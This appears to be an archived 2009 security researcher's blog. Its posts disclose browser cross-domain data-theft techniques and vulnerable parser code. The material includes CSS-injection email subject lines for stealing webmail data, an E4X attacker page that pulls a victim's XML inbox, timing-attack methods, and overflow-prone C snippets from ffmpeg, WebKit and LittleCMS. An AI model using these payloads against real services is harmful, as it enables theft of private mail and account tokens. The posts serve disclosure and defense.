Monday, December 28, 2009

Generic cross-browser cross-domain theft

Well, here's a nice little gem for the festive season. I like it for a few distinct reasons:

  1. It's one of those cases where if you look at web standards from the correct angle, you can see a security vulnerability specified.

  2. Accordingly, it affected all 5 major browsers. And likely the rest.

  3. You can still be a theft victim even with plugins and JavaScript disabled!
It's much less serious than it could be because there are restrictions on the format of cross-domain data which can be stolen, and the attacker needs to be able to exercise limited control of the target theft page.
The issue is best introduced with an example. The example chosen is deliberately a little bit involved and not too severe. This is to give the upcoming browser updates a chance to get deployed.

Example: Yahoo! Mail cross-domain subject line theft and e-mail deletion

(It's important to note there is no apparent failing of the web app in question here).

  • Step 1: E-mail your victim with the subject line ');}

  • Step 2: Wait a bit (assume that other e-mails are delivered to the victim at this time)

  • Step 3: E-mail your victim with the subject line {}body{background-image:url(' and include in the body: PLEASE CLICK

  • Step 4: Mild profit if the victim clicks the link.

If you set up the above scenario as a test, you might see something like this in an alert box upon clicking the link:


The above text is stolen cross-domain, and the interesting pieces are highlighted in bold. The data includes the subjects, senders and "mid" value for all e-mails received between the two set-up e-mails we sent the victim.
Although leaking of subjects and senders is not ideal, it's the "mid" value that interests us most as an attacker. This would appear to be a secure / unguessable ID. Accordingly, it is reasonable for the mail application to rely on it as a distinct anti-XSRF token. This is indeed the case for the "delete" operation, implemented as a simple HTTP GET request. Interestingly, the "forward" operation seems to have an additional anti-XSRF token in the POST body, making the "mid" leak not nearly as serious as it could have been.

That's how this whole attack proceeds in its most powerful form: leak a small amount of text cross-domain, and then bingo! if the leaked text happens to include a global anti-XSRF token.

How does it work?

It works by abusing the standards relating to the loading of CSS style sheets. Approximately, the standards are:

  • Send cookies on any load of CSS, including cross-domain.

  • When parsing the returned CSS, ignore any amount of crap leading up to a valid CSS descriptor.
By controlling a little bit of text in the victim domain, the attacker can inject what appears to be a valid CSS string. It does not matter what precedes this CSS string: HTML, binary data, JSON, XML. The CSS parser will ruthlessly hunt down any CSS constructs within whatever blob is pulled from the victim's domain. To the CSS parser, the text in the above attack looks like this:

(some HTML junk; whatever){} body{background-image:url(' stuff...')}(some trailing HTML junk)

So, the background of the attacker's page will be styled with a background image loaded from a URL, the path of which contains stolen data! One lovely twist of using a CSS string which is a URL is that it will be automatically fetched even if JavaScript is turned off! The stolen data is then harvested by the attacker from their web server logs.
Fortunately, there are various barriers to exploiting this:

  • Any newlines in the injected string break the CSS parse. This is a very common condition which stops potentially serious attacks.

  • CSS strings may be quoted within the ' or " characters. In a context where both of these are escaped (HTML escaped, URL escaped, whatever), it will not be possible to inject a CSS string.

  • The attacker needs control of two injection points: pre-string and post-string. For many sensitive pages, the attacker won't have sufficient influence over the page data via URL params or reflection of attacker data.
General areas that are more susceptible to this attack include:

  • JSON / XML feeds (common lack of newlines; no requirement to escape " (JSON strings) or ' (XML text nodes)).

  • Socially-related websites (the victim is always browsing attacker-controlled strings such as comments on their mundane photos, etc).

How do we fix it?

It would be nice to be able to not send cookies for cross-domain CSS loads; however that would certainly break stuff and it's hard to measure what without actually causing the breakage.

It would be nice to be strict on the MIME type when loading CSS resources -- if not globally then at least for cross-domain loads. But this breaks high profile sites, *cough* and text/plain *cough*. (To be fair, it gets much worse with many sites even using text/html, application/octet-stream, it goes on).

A good balance is to require the alleged CSS to at least start with well-formed CSS, iff it is a cross-domain load and the MIME type is broken. This is the approach I used in my pending WebKit patch.

Note that fixing this issue also fixes my previous attack of using cross-domain CSS to reliably tell if someone is logged in or not:

Credits:
  • Aaron Sigel, for interesting discussions about using /*-style multi-line comments to bypass the newline restriction. Looks like it's not possible to recover comment text but we didn't test all the browsers.

  • Opera, for seemingly fixing this in v10.10 - although I don't know the exact heuristic used.

  • The WebKit and Mozilla communities for good feedback on approaches and patches.

Tuesday, December 22, 2009

Bypassing the intent of blocking "third-party" cookies

[Aside: I'm not sure anyone cares, particularly because the "block third party cookies" option tends to break legitimate web sites. But I'll document it just in case :)]

Major browsers tend to have an option to block "third-party" cookies. The main intent of this is to disable tracking cookies used by iframe'd ads.

It turns out that you can bypass this intent by abusing "HTML5 Local Storage". This modern browser facility is present in (at least) Firefox 3.5, Safari 4 and even the normally-lagging IE8. Chrome 4 Beta has it too, making it well supported across all browsers and a more tempting target.

In concept, HTML5 Local Storage is very similar to cookies. On a per-origin basis, there is a set of disk-persisted name / value pairs.

With a simple test, it's easy to show that the HTML5 Local Storage feature is not affected by the third-party cookie setting. I believe this holds across all the above browsers. A simple test page that gets / sets a name / value pair from within a third-party iframe may be located here:

(This page also tests for a similar situation with HTML5 Web Database, but that is so far a less supported standard).

What's interesting is that all these browsers did remember to disable these persisted databases in their various private modes.

Friday, December 11, 2009

Cross-domain search timing

I've been meaning to fiddle around with timing attacks for a while. I've had various discussions in the past about the significance of login determination attacks (including ones I found myself) and my usual response would be "it's all moot -- the attacker could just use a timing attack". Finally, here's some ammo to support that position. And -- actual cross-domain data theft using just a timing attack, as a bonus.

Unfortunately, this is another case of the web being built upon broken specifications and protocols. There's nothing to stop one domain referencing resources on another domain and timing how long the server takes to respond. For a GET request, a good bet is the <img> tag plus the onerror() / onload() events. For a POST request, you can direct the post to an <iframe> element and monitor the onload() event.

Why should an evil domain be able to read timing information from any other domain? Messy. Actually, it's even worse than that. Even if the core web model didn't fire the relevant event handlers for cross-domain loads, there would still be trouble. The attacker is at liberty to monitor the performance of a bunch of busy-loops in JavaScript. The attacker then frames or opens a new window for the HTML page they are interested in. When performance drops, the server likely responded. When performance goes up again, the client likely finished rendering. That's two events, and actually a leak of more information than the pure-event case.

Moving on to something real. The most usable primitive that this gives the attacker is a 1-bit leak of information. i.e. was the request relatively fast or relatively slow? I have a little demo:

It takes a few seconds, but if I'm not logged into Yahoo! Mail, I see:

DONE! 7 79 76 82

From the relatively flat values of the last three timings (three different inbox searches) and the relative latency between the first number and the latter three, it's pretty clear I'm not logged in to Yahoo! Mail.

If I'm logged in, I see:

DONE! 10 366 414 539

This is where things get interesting. I am clearly logged in because of the significant server latency inherent in a text search within the inbox. But better still, the last three numbers represent searches for the words nosuchterm1234, sensitive and the. Even with a near-empty inbox, the server has at least a 40ms difference in minimum latency between a query for a word not in the index, and a query for a word in the index. (I mailed myself with sensitive in the subject to make a clear point).

There are many places to go from here. We have a primitive which can be used to ask cross-domain YES/NO questions about a victim's inbox. Depending on the power of the search we are abusing, we can ask all sorts of questions. e.g. "Has the victim ever mailed X?", "If so, within the past day?", "Does the word earnings appear in the last week?", "What about the phrase 'earnings sharply down'?" etc. etc. By asking the right YES/NO questions in the right order, you could reconstruct sentences.

It's important to note this is not a failing of any particular site. A particular site can be following current best practices and still be bitten by this. Fundamentally, many search operations on web sites are non-state-changing GETs or POSTs and therefore do not need XSRF protection. The solution, of course, is to add it (and do the check before doing any work on the server, like walking indexes)!

With thanks to Michal Zalewski for interesting debate and Christoph Kern for pointing out this ACM paper, which I haven't read but from the abstract it sounds like it covers some less serious angles of the same base attack.

Tuesday, November 17, 2009

vsftpd-2.2.2 released

Just a quick note that I released vsftpd-2.2.2.
Most significantly, a regression was fixed in the inbuilt listener. Heavily loaded sites could see a session get booted out just after the initial connect. If you saw "500 OOPS: child died", that was probably this.

Monday, November 2, 2009

A new fuzz frontier: packet boundaries

Recently, I've been getting pretty behind on executing my various research ideas. The only sane thing to do is blog the idea in case someone else wants to run with it and pwn up a bunch of stuff.

The general concept I'd like to see explored is perhaps best explained with a couple of concrete bugs I have found and fixed recently:

  1. Dimensions error parsing XBM image. Welcome to the XBM image format, a veritable dinosaur of image formats. It's a textual format and looks a bit like this:
    #define test_width 8
    #define test_height 14
    static char test_bits[] = {
    0x13, 0x00, 0x15, 0x00, 0x93, 0xcd, 0x55, 0xa5, 0x93, 0xc5, 0x00, 0x80,
    0x00, 0x60 };
    The WebKit XBM parsing code includes this line, to extract the width and height:
        if (sscanf(&input[m_decodeOffset], "#define %*s %i #define %*s %i%n",
                   &width, &height, &count) != 2)
            return false;

    The XBM parser supports streaming (making render progress before you have the full data available), including streaming in the header. i.e. the above code will attempt to extract width and height from a partial XBM, and retry with more data if it fails. So what happens if the first network packet contains an XBM fragment of exactly the first 42 bytes of the above example? This looks like:
    #define test_width 8
    #define test_height 1
    I think you can see where this is going. The sscanf() sees two valid integers, and XBM decoding proceeds for an 8x1 image, which is incorrect. The real height, 14, had its ASCII representation fractured across a packet boundary.

  2. Out-of-bounds read skipping over HTML comments. This is best expressed in terms of part of the patch I submitted to fix it:
    --- WebCore/loader/TextResourceDecoder.cpp (revision 44821)
    +++ WebCore/loader/TextResourceDecoder.cpp (working copy)
    @@ -509,11 +509,13 @@ bool TextResourceDecoder::checkForCSSCha
    static inline void skipComment(const char*& ptr, const char* pEnd)
    {
        const char* p = ptr;
    +    if (p == pEnd)
    +        return;
        // Allow <!-->; other browsers do.
        if (*p == '>') {
            p++;
        } else {
    -        while (p != pEnd) {
    +        while (p + 2 < pEnd) {
                if (*p == '-') {
                    // This is the real end of comment, "-->".
                    if (p[1] == '-' && p[2] == '>') {

    As can be seen, some simple bounds checking was missing. In order to trigger, the browser would need to find itself processing an HTML fragment ending in:
    (Where "ending in" means not necessarily the end of the HTML, but the end of the HTML that we have received so far).
The general principle here? Software seems to have a lot of failure conditions with partial packets! This is unsurprising when you think about it; software is frequently trying to make progress based on partial information -- whether it's image or HTML parsers trying to show progress to the user, or network servers trying to extract a useful header or state transition from a short packet.
Typical fuzzing may not be able to trigger these conditions. I've certainly fuzzed image codecs using local files as inputs. This would never exercise partial packet code paths.
The best way to shake out these bugs is going to be to fuzz the packet boundaries at the same time as the packet data. Let me know if you find anything interesting :)

Monday, October 19, 2009

Chromium and Linux sandboxing

It was great to talk to so many people about Chromium security at HITB Malaysia. I was quite amused to be at a security conference and have a lot of conversations like:

Me: What browser do you use?
Other: Google Chrome.
Me: Why is that?
Other: Oh, it's so much faster.
Me: Oh, you saw that awesome JSNES, huh?

It's a sobering reminder that users -- and even security experts -- are often making decisions on things like speed and stability. It was similar with vsftpd. I set out to build the most secure FTP server, but usage took off unexpectedly because of the speed and scalability.

Julien talked about his clever Linux sandboxing trick that is used in the Chromium Linux port. One component of the sandbox is an empty chroot() jail, but setting up such a jail is a pain on many levels. The problems and solutions are as follows:
  • chroot() needs root privilege. Therefore, a tiny setuid wrapper binary has been created to execute sandboxed renderer processes. Some people will incorrectly bleat and moan about any new setuid binary, but the irony is that it is required to make your browser more secure. Also, a setuid binary can be made small and careful. It will only execute a specific trusted binary (the Chromium renderer) inside an empty jail.

  • exec()ing something from inside an empty jail is hard, because your view of the filesystem is empty. You could include copies of the needed dynamic libraries or a static executable but both of these are a maintenance and packaging nightmare. This is where Julien's clever tweak comes in. By using the clone() flag CLONE_FS, and sharing the FS structure between a trusted / privileged thread and the exec()ed renderer, the trusted thread can call chroot() and have it affect the unprivileged, untrusted renderer process post-exec. Neat, huh?

  • Other tricks such as CLONE_NEWPID and CLONE_NEWNET are used or will be used to prevent sending of signals from a compromised renderer, and network access.

Finally, it is worth noting that sandboxing vs. risks on the web are widely misunderstood. The current Chromium sandbox mitigates Critical risk bugs to High risk bugs. This may be enhanced in the future. Since any bugs within the sandbox are still High risk, I of course take them very seriously and fix them as a priority. But, that lowering of a certain percentage of your bugs away from Critical risk is really key. The vast majority of web pwnage out there is enabled by Critical risk bugs (i.e. full compromise of user account => ability to install malware), so mitigating any of these down to High is a huge win. It's easy to get excited about any security bug, but we as an industry really need to get more practical and concentrate on the ones actually causing damage.

Attacking this point from another angle: any complicated software will inevitably have bugs, and a certain subset of bugs are security bugs. Note that any web browser is certainly a complicated piece of software :) Therefore, any web browser is always going to have security bugs. And indeed, IE, Opera, Firefox, Safari and Chrome are issuing regular security updates. For some reason, the media reports on each and every patch as if it is a surprising or relevant event. The real question, of course, is what you do in the face of the above realization. The Chromium story is two powerful mitigations: sandboxing to reduce severity away from Critical, and a very fast and agile update system to close any window of risk.

Sunday, October 18, 2009

vsftpd-2.2.1 released

Nothing too exciting, just two regressions fixed: "pasv_address" should work again, and SSL data connections should no longer fail after a long previous transfer or an extended idle period.

Tuesday, October 13, 2009

HITB Malaysia 2009 and sandboxing

No time for details at the moment, but I'm just back from HITB Malaysia and a great time was had by all! The hospitality and warmth of the organizing crew surpassed anything I've ever encountered before.

I presented with my colleague Julien Tinnes. See awesome blog:

We presented on various intriguing aspects of sandboxing on Linux, covering vsftpd and Chromium as test cases. Our slides are located here:

Security in Depth for Linux Software

As per other presentations, I'll leave it at that for now and follow up with a mini series of posts for the more interesting points. I think vsftpd is well covered by previous posts, but Chromium on Linux is awesome and its built-in sandboxing deserves a few notes.

Tuesday, September 22, 2009

Patching ffmpeg into shape

Preface: unless otherwise noted, the bugs discussed here were found via fuzzing by Will Dormann of CERT -- and my involvement was to fix them. In other news, I recently moved to work on the Chromium project / Google Chrome, which I'm very excited about. It is in this new role that this piece of work was conducted, as part of HTML5 features.

I recently fixed a lot of security bugs in ffmpeg, across a subset of the supported containers and codecs. The bugs represented a range of different C vulnerability classes, which I thought might make an interesting blog post.

  1. Out-of-bounds array index read in vorbis_dec.c:

    mapping_setup->submap_floor[j] = get_bits(gb, 8);
    mapping_setup->submap_residue[j] = get_bits(gb, 8);
    ...
    no_residue[i] = floor->decode(vc, &floor->data, ch_floor_ptr);

    The index usage is far from where it is read, making this trickier to find by code auditing. Note how this is exploitable, despite being an out-of-bounds read. The out-of-bounds memory is used as a function pointer! It's easy to forget that out-of-bounds reads can be very serious.

  2. Off-by-one indexing error in vp3.c:

    for (j = 0; j < run_length; i++) {
        if (i > s->coded_fragment_list_index)
            return -1;

        if (s->all_fragments[s->coded_fragment_list[i]].qpi == qpi) {

    The > should be >= otherwise there is an out-of-bounds read. In this instance, the out-of-bounds read is for an index that is used to read and write to another array, so you have possible memory corruption as a consequence.
    Found by me with some additional fuzzing.

  3. Interesting pointer arithmetic bug in oggparsevorbis.c:

    while (p < end && n > 0) {
        const char *t, *v;
        int tl, vl;

        s = bytestream_get_le32(&p);

        if (end - p < s)
            break;

        t = p;
        p += s;
The subtlety here is that bytestream_get_le32() advances the pointer passed to it, by sizeof(int). If the current position pointer p points to, say, 3 bytes of remaining buffer, then we have two problems. Firstly, the integer read will include one byte of out-of-bounds data. More seriously, the condition p > end will end up being true. Subsequently, a very large value of s may escape the check against end - p. This will lead to attacker-controlled out-of-bounds reads later.

  4. Assignment vs. comparison operator mix-up in vorbis_dec.c:

    for (i = 0; i < mapping->submaps; ++i) {
        vorbis_residue *residue;
        uint_fast8_t ch = 0;

        for (j = 0; j < vc->audio_channels; ++j) {
            if ((mapping->submaps == 1) || (i = mapping->mux[j])) {

    Do you see it? This is actually a serious bug because these loops are writing to an output heap buffer, and the loops have been carefully checked so that they will terminate before they overflow said buffer! Unfortunately, assigning to the loop iterator from an attacker-controlled variable will permit the attacker to conduct a heap overflow.
    Found by me via code auditing.

  5. Integer underflow leading to stack pointer wrap-around in vorbis_dec.c:

    uint_fast16_t n_to_read=vr->end-vr->begin;
    uint_fast16_t ptns_to_read=n_to_read/vr->partition_size;
    uint_fast8_t classifs[ptns_to_read*vc->audio_channels];

    All sorts of interesting stuff going on here. For a start, missing validations parsing the header earlier do not prevent begin > end, leading to an integer underflow. Furthermore, uint_fast16_t on my platform at least is a 32-bit wide type. This enables the calculation for the size of the stack-based array to result in any 32-bit value too. On a 32-bit platform, this can result in the stack pointer wrapping around and moving "up" rather than "down". A usually exploitable condition. Even creating a huge (but non-wrap-causing) stack frame can have consequences depending on whether your system does a simple calculation on the stack pointer, or is more careful to fault each new page in case an end-of-stack guard page exists.

  6. Integer underflow by 1 in mov.c:

    static int mov_read_elst(MOVContext *c, ByteIOContext *pb, MOVAtom atom)
    {
        MOVStreamContext *sc = c->fc->streams[c->fc->nb_streams-1]->priv_data;
        ...
        sc->time_offset = time != -1 ? time : -duration;

    The problem here is that it is assumed that nb_streams > 0 but no such condition is guaranteed if the attacker supplies an "elst" tag before supplying any tag that creates a stream. The result is that a pointer is used from an out-of-bounds location. Use of any invalid or corrupt pointer is usually an exploitable condition, of course.

  7. Type confusion bug in mov.c / utils.c:
    (No code sample)
    The most interesting bug, in my opinion. It triggers when a corrupt ordering of tags in the MOV container sets up variables such that "codec type" is e.g. VIDEO whereas "codec id" is e.g. MP3. Subsequently, some core code passes a pointer to a stack-allocated video structure to the mp3 decoder. The mp3 decoder, assuming it has a pointer to the (larger) audio structure, happily causes a stack-based buffer overflow. Cool.
    Found by me with some additional fuzzing.

  8. Other:
    This blog post got too long. Other bug classes included divide by zero, infinite looping, stack-based buffer overflow due to missing bounds check, classic integer overflow, and likely others. See the patches if you are interested:

  9. Epilogue: The potential for bugs like these is why Chromium runs codecs inside its built-in sandbox. Although bugs inside the sandbox are still taken seriously, they are no longer of "Critical" severity. The real user damage on the web at this time is conducted by malware exploiting "Critical" severity bugs in some browser or plug-in.

Wednesday, August 12, 2009

vsftpd-2.2.0 released

Not much of interest to add beyond the interesting network isolation support previously discussed. Some minor bugs were fixed. A bunch of compile errors were addressed. There is now support for PAM modules which remap the underlying user account. There is also a new command-line option to pass config file options directly.

Wednesday, August 5, 2009

Apple ColorSync heap overflow

Apple just released the Mac OS X 10.5.8 update, which includes security fixes:

One of the fixes is for a heap-based buffer overflow in the ColorSync component (which handles the parsing of ICC profiles). Limited details are here:

This vulnerability could likely be used to execute arbitrary code in contexts such as Safari browsing to a malicious page. Mail clients (both web-based and local client based) might make an interesting target.

This was discovered because the test case for my earlier LittleCMS (lcms) vulnerabilities happens to crash Safari when you hit it:

Friday, July 10, 2009

Beware the little pieces you use in your web app

I've just released the technical details behind some recently fixed vulnerabilities in mimetex:

"mimetex" is a little binary (written in the C language) used to render mathematical equations based on the TeX language. It looks very nice and it's a cool concept to embed in web apps. You can use a Google search to locate places that use it:

Unfortunately, the binary suffered from various classic stack-based buffer overflows as well as some commands that might leak inappropriate information.

So be careful what random little binaries and pieces you use to beef up your web app.

iPhone and Safari advisories

Catching up on a few items. I seem to have gotten a mention in a couple of recent Apple advisories:

iPhone 3.0 security fixes

Safari 4.0.2

It's one of the Safari bugs that interests me today, CVE-2009-1725 or an off-by-one heap memory corruption in Webkit. The patch says it all, really:

Here's the faulty code:

// ignore the sequence, add it to the buffer as plaintext
*dest++ = '&';
for (unsigned i = 0; i < cBufferPos; i++)
    dest[i] = m_cBuffer[i];

Turns out, a 10 in the surrounding code should be an 11, so it is possible to write a semi user-controlled byte one byte past the end of a heap chunk. If you know what useful tricks you might do with that in the various heap implementations (Windows, Mac, Linux) -- please leave a comment.

Here's a demo HTML document:

It tries to pad the HTML so that the errant byte is written off the end of the heap, instead of into buffer slack. Bear in mind that the most common symptom here is no symptom at all :) In Chrome / Windows, repeated refresh of that URL would occasionally render a random Asian character, but no crash.

Tuesday, July 7, 2009

vsftpd-2.2.0pre1 and network separation

Following on from vsftpd-2.1.2, I've just released vsftpd-2.2.0pre1:

This further plays with the new Linux container flags: this time, CLONE_NEWNET. This flag creates a process with a separate (and empty) list of network devices and bindings. A process isolated in such a way can create network sockets but any attempt to e.g. do an IPv4 connect() to localhost (or any other destination) will get ENETUNREACH.

CLONE_NEWNET is a very new facility and is not yet generally available in Linux distributions. For example, Fedora 11 offers it whereas Ubuntu 9.04 does not.

When available, vsftpd uses CLONE_NEWNET for the unprivileged protocol handler processes (both pre- and post-login). This means a compromised handler process will no longer get access to sensitive networks such as localhost or behind the firewall. This is on top of existing restrictions on the filesystem, local processes and local IPC.

The use of CLONE_NEWNET does provide some design challenges -- fundamentally, the protocol handler needs to be able to connect() out to handle the PORT command. Also, the listening sockets handling PASV need access to network interfaces. vsftpd solves this by re-using its privileged helper architecture. The creation of any data channel network socket is now a privileged operation. The privileged side enforces that a connect() may only be performed back to the real FTP client machine. It hands the resulting socket to the unprivileged protocol handler which then gets to use it as normal since it is already bound to a real network interface and connected. I've checked that attempts to shutdown() and connect() such a socket result in EISCONN so hopefully there is no way to abuse the connected socket on the untrusted side to bypass the CLONE_NEWNET setup. Input welcome. This was fun :)

Thursday, June 18, 2009


I've just noticed that a Google search for "clusterfuzzing" (including the quotes) has no hits. Therefore, I'm reserving the term :) All I need now is a new fuzzing angle and then I've got all the makings of a great presentation!

Actually, I do have a new twist on fuzzing. All I need is the bugs. Watch this space!

Wednesday, June 10, 2009

Bonus Safari XXE (only affecting Safari 4 Beta)

Here's another XXE bug for you (resulting in file theft), just to make the point that this class of bugs is well worth watching out for in client-side applications (such as a browser :)

The good news here is that this WebKit regression was quickly fixed by Apple -- and in time for the Safari 4 final release -- so no production browser should ever have been affected. Just the Safari 4 Beta.

Full credit here to Carlos Pizano who noticed the WebKit regression due to a collision with the Chrome sandbox. I just put together the Safari test case / demo:

Tuesday, June 9, 2009

Apple's Safari 4 also fixes cross-domain XML theft

Safari 4 also fixes an interesting cross-domain XML theft. Full technical details live here:

XML theft can include highly sensitive data thanks to things like XHTML, AJAX-y RPCs using XML and authenticated RSS feeds. The example I have steals XML representing a logged-in Gmail user's inbox:

Safari 3 demo for users logged in to Gmail

I think there's a lot more room for browser-based cross-domain leaks (sometimes called UXSS or universal XSS). This is because the pace of new browser features is very high, and lots more functionality is being added that involves reference by URI. Every such addition is a possible vector for a missing or incorrect (e.g. 302 redirect tricks) cross-domain check; or even an ill-advised specification-based cross-domain leak.

This is one of the serious Safari bugs demoed but not disclosed at my PacSec and HiTB Dubai presentations. I forgot to note that my previous post on file theft was another.

Monday, June 8, 2009

Apple's Safari 4 fixes local file theft attack

Safari 4 was just released and among the various improvements is a range of security fixes. One of these fixes is for an XXE attack against the parsing of the XSL XML. Full technical details may be found here:

Or for the lazy, you can skip straight to the:

Demo for Safari 3 / MacOS
Demo for Safari 3 / Windows

I found it interesting that Safari 3 seemed robust against XXE attacks in general -- there are a lot of places that browsers find themselves parsing XML (XmlHttpRequest, prettifying XML mime type documents, SVG, E4X, etc.) However, the relatively obscure area of the XSL XML succumbed to an XXE attack.

(Note: awareness of XXE attacks remains low despite the issue being documented since at least 2002).

Friday, May 29, 2009

vsftpd-2.1.2 released and new security tricks

(Note: v2.1.2 is the same as v2.1.1 but with a compile fix)

vsftpd-2.1.2 is released with full details as always on the vsftpd home page:

For users, a couple of nasty regressions are fixed: SSL transfers would drop due to an errant timeout firing; this is now fixed. Also, an absent per-user config file was fine with v2.0.7 but an error in v2.1.0. v2.1.2 restores v2.0.7 behaviour.

For Linux developers / security types, there are a couple of much more interesting stories:
  • RLIMIT_NPROC support. Least interestingly, the unprivileged vsftpd processes limit their own ability to launch new processes. A compromise of such a process now does not get to cause a nuisance by flooding the system with more processes. In addition, privilege escalations via kernel bugs in the copious clone() API and involving subtle interactions between collaborating evil processes should be mitigated.

  • RLIMIT_NOFILE support for some of the unprivileged vsftpd processes. This excellent defensive tweak comes courtesy of my colleague Tavis Ormandy with further research by Julien Tinnes. When set to 0, this limit prevents a process from gaining any new file descriptors. So a compromised unprivileged process doesn't get to create new network sockets or open new files. Of course the filesystem aspect is not as good as chroot() because non-fd-based syscalls such as stat() etc. will still leak information and something like rename() may present a total compromise. So there's limited value without combination with a chroot() and also a switch to a different UID to prevent devastating ptrace() attacks. This is a shame because this facility is available to non-root users; and options to voluntarily jail yourself as a non-root user under Linux are generally terrible. There are a couple of additional annoyances: POSIX requires that RLIMIT_NOFILE==0 prevents any file descriptors in a poll() call but curiously not select(). Also, the limit includes file descriptors passed in over a UNIX socket so this precludes some neat designs. Still, an interesting tweak to bear in mind.

  • CLONE_NEWPID / CLONE_NEWIPC support for all distinct vsftpd sessions. These flags were added to the Linux kernel extremely recently, and essentially allow you to launch new processes in isolated PID and IPC ID spaces. This represents further limits on the damage that a compromised vsftpd process could cause. The isolated PID space means no ability to kill() all other vsftpd sessions. (Note that the more serious ptrace() is already carefully defended against with management of the per-process "dumpable" concept). The isolated IPC ID space means no ability to abuse the common flaw of IPC objects with inappropriate world-access permissions.

Wednesday, May 20, 2009

A more plausible E4X attack

As a quick recap, "E4X" is the name of a Javascript standard relating to strong XML support in the language. Firefox has had an implementation for quite some time but no other major browser seems to have followed suit.

My colleagues Filipe Almeida and Michal Zalewski led the way in E4X security; check out:

However, the attack scenarios in that document are in my opinion not likely to occur in many web apps. It so happens that I was fiddling around the night before my HiTB talk (which briefly covers E4X) and I came up with something more compelling. Take a hypothetical web mail service which provides an XML feed format of the inbox, which might look something like this:

<mail id="1234"><from></from><subject>{ x = '</subject><body>PWN...</body></mail>
<mail id="1235"><from></from><subject>Super sensitive!</subject><body>New pin: 9976</body></mail>
<mail id="1236"><subject>' }</subject><body>...ed!!</body></mail>

One general concept of interest in the above fragment is the ability of the attacker to echo little pieces of attacker-controlled text onto a trusted domain. Specifically, in e-mail subject text! More on this in another post.
With this realization, we're all set to mount an E4X-based theft attack. First, you'll want to see it in action. You'll need Firefox to see the popup alert indicating cross-domain XML theft:

The attack works by cross-domain including the XML formatted inbox into the attacker's page via <script src="blah">. Raw XML is valid Javascript in Firefox, thanks to E4X, so this parses and executes in the attacker's context. The reason the attacker is able to mount a theft is that E4X looks for curly braces in XML values and tries to interpret the surrounded text as a Javascript expression to evaluate. Looking again at our above XML, we see the following in the middle:

<subject>{ x = '</subject><body>PWN...</body></mail>
<mail id="1235"><from></from><subject>Super sensitive!</subject><body>New pin: 9976</body></mail>
<mail id="1236"><subject>' }

As you can see, the attacker's sneaky choice of subject lines has caused an expression to be evaluated which:
  • Wraps a part of the XML in single quotes, forming a Javascript string literal.
  • Assigns said string literal to a Javascript variable in the attacker's domain!
  • Leaves the XML tag structure balanced, thanks to the repeating nature of the XML tree.
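Concretely, the attacker's page can be as simple as the following sketch (all hostnames and paths are hypothetical):

```html
<!-- Hosted on the attacker's domain; names hypothetical. -->
<html>
  <body>
    <!-- Cross-domain include: Firefox's E4X support parses the raw
         XML inbox as script, so the { x = '...' } curly-brace
         expression planted in the subject lines runs in THIS page's
         Javascript context. -->
    <script src="https://webmail.example/inbox.xml"></script>
    <script>
      alert(x); // x now holds the stolen middle of the victim's inbox
    </script>
  </body>
</html>
```
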

For the attack to work, there are constraints:
  • There must be no newlines in the part of the XML structure that you are stealing, because Javascript literals cannot span unescaped newlines.
  • There must be no XML prolog or DTD since these break the Firefox E4X parser.
  • The single quote character must be rendered into XML values unescaped and double quotes must be used to surround XML attributes (or vice versa).

There will be real-world services matching these constraints. When you find them, drop me an e-mail or leave a comment.
As always, Mozilla security responded wonderfully to this advance in E4X theft. A behavioural tweak was committed and is due in Firefox 3.5, which will break this attack.

Friday, May 1, 2009

HiTB Dubai: all over apart from the blogging

I recently had the pleasure to be invited by Dhillon to present at HackInTheBox (HiTB) Dubai with Billy Rios on our "Cross Domain Leakiness" work. Here is a link to our updated slides:

It was a very productive conference, all told. The sort of conference where new attacks materialise over breakfast conversations. In terms of new and pending material, I'll do separate posts regarding:
  • My latest E4X cross-domain theft attack (building on the work of my colleagues Filipe and Michal)

  • A new "divided login" attack (Billy and I having fun over breakfast)

  • JDK GIFAR fix considered incomplete

  • A new cross-browser cross-domain theft
There was also a very interesting (and perhaps overdue) theme running throughout the conference. It was best put in words during Mark Curphey's keynote address: "builders vs. breakers". And my summary of this is that the industry has too many breakers and not enough builders. Builders have the maturity to step back from the world of random bugs and glitzy hacks, and move the state of security forward. But the economics of the security industry often selects for breakers: the 17 year old kid who finds an XSS in Twitter gets all the press attention; conferences are full of talks about one-off hacks and breaking technologies because the "let's fix it" talks are not showy enough; opinionated and technically lacking blogs and advisories seem to be favoured sources of information.

I'm going to be thinking about contributing more to the building side.

Friday, March 27, 2009

Sun Java JRE Pack200 bugs

A friend of mine, Rich Cannings, spotted my name in a Sun security advisory so I guess this means my Pack200 crashes are fixed:

This bug continues a trend of attacking the native code parsers within the JRE in order to break out of it. The most obvious application is to take over desktops via evil applets which abuse these bugs to cause memory corruptions.

The individual bugs themselves are pretty lame insofar as they are under-researched with a bit of dumb fuzzing. I was simply testing the general area for robustness, and found trouble. Other people have hit the same area, through iDefense, in the past couple of JRE updates -- hopefully they did a better job than me.

The interesting point is that researchers seem to have gotten the point regarding native code in the JRE. I've hit areas such as 2D graphics; ICC parsing and now Pack200 parsing. Others have hit GIF parsers and the font parsing. Aside from well-tested native code (jpeglib, zlib, libpng), and more of the same (e.g. a lot of font / 2D medialib code!), what's left? sun.java2d? Have at it :)

Thursday, March 26, 2009

LittleCMS exploit

Now that new packages are out for lcms and OpenJDK, I'll publish my LittleCMS exploit. It's harmless in that if it actually works on your machine, all it does is put your CPU into a spin -- watch out for 100% CPU usage. It's also relatively harmless in that it doesn't work on many systems out of the box. I targeted my 32-bit Ubuntu 8.10 laptop which happens to have an executable heap, executable stack, no stack cookies but does have ASLR.

Here's the sample JPG file with embedded evil ICC profile:

I'm only bothering to write about this because the story behind the exploit contains a few interesting twists which illustrate the iterative constraint solving used in modern exploits:
  • The underlying code flaw is a stack-based buffer overflow. But the data going past the bounds is not arbitrarily user-controlled. (If it were, a traditional stack smashing exploit would work, but the ASLR could affect the reliability of the exploit). Here's the faulty code in cmsio1.c, where nCurves can end up greater than MAXCHANNELS:

    LCMSBOOL ReadSetOfCurves(LPLCMSICCPROFILE Icc, size_t Offset, LPLUT NewLUT, int nLocation)
    {
        /* ... */
        for (i = 0; i < nCurves; i++) {
            Curves[i] = ReadCurve(Icc);
        }
        /* ... */
    }

  • The data going past bounds is actually pointers to heap chunks (returned by ReadCurve). This is nice because it takes ASLR out of the equation. We'll automatically overwrite %eip with a pointer to a valid heap address. But what is in that heap chunk? If it were arbitrary user controlled data, we'd have game over already, but unfortunately it is not. We're looking at pointers to this structure:

    struct GAMMATABLE {
        unsigned int Crc32;
        int Type;
        double Params[10];
        int nEntries;
        WORD GammaTable[1];
    };

